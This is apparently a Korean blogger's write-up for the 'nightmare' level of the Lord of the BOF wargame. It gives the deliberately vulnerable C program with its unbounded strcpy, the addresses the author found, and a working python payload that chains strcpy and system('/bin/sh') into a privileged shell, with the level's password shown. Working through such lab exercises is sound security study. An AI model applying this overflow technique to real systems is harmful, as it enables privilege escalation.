nightmare
/* The Lord of the BOF : The Fellowship of the BOF - nightmare - PLT */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>   /* challenge-local header, not part of the C standard library */

/*
 * Challenge binary: deliberately vulnerable, do not "fix" the overflow.
 *
 * Reads argv[1] and copies it into a fixed 40-byte stack buffer with an
 * unbounded strcpy(), after first demanding that bytes 44..47 of argv[1]
 * equal the address the binary itself resolves for strcpy (the title says
 * "PLT", so presumably the PLT stub address -- confirm in the binary).
 *
 * NOTE: `main` is declared without a return type (pre-C99 implicit int);
 * a C99+ compiler will warn or reject it.
 */
main(int argc, char *argv[])
{
    char buffer[40];   /* the overflow target: no length is ever checked against it */
    char *addr;        /* holds the address of strcpy for the 4-byte comparison below */

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // check address: the 4 bytes at offset 44 of argv[1] must be the address of strcpy.
    // NOTE(review): there is no check that argv[1] is at least 48 bytes long, so a
    // short argument makes memcmp() read past the end of the argv[1] string.
    addr = (char *)&strcpy;
    if(memcmp(argv[1]+44, &addr, 4) != 0){
        printf("You must fall in love with strcpy()\n");
        exit(0);
    }

    // overflow! argv[1] is copied with no bound; anything longer than 39 bytes
    // plus the terminator writes past buffer[] into the rest of the stack frame.
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    // dangerous waterfall: writes 4 bytes 8 past the end of the 40-byte buffer,
    // i.e. beyond the object entirely. On this challenge's 32-bit frame that is
    // presumably the word just above the saved return address -- confirm against
    // the actual frame layout, the exact offset depends on the compiler.
    memset(buffer+40+8, 'A', 4);
}
strcpy = 0x8048410
system = 0x40058ae0
ebp-40 = 0xbffffaa0
"/bin/sh" = 0x400fbff9
ret+4 = 0xbffffad0
[succubus@localhost succubus]$ ./nightmare `python -c 'print "\xe0\x8a\x05\x40"+"A"*4+"\xf9\xbf\x0f\x40"+"A"*32+"\x10\x84\x04\x08"+"A"*4+"\xd0\xfa\xff\xbf"+"\xa0\xfa\xff\xbf"'` �@AAAA�@AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�������� bash$ my-pass euid = 518 beg for me bash$ id uid=517(succubus) gid=517(succubus) euid=518(nightmare) egid=518(nightmare) groups=517(succubus)
nightmare / beg for me
잘못 된 개념을 서술하였거나, 잘못 풀이된 내용이 있으면 댓글 달아주시면 감사합니다 :) 태클 댓글이나 메일(513.eunice@gmail.com) 환영입니다 !! 😊☺️👍 |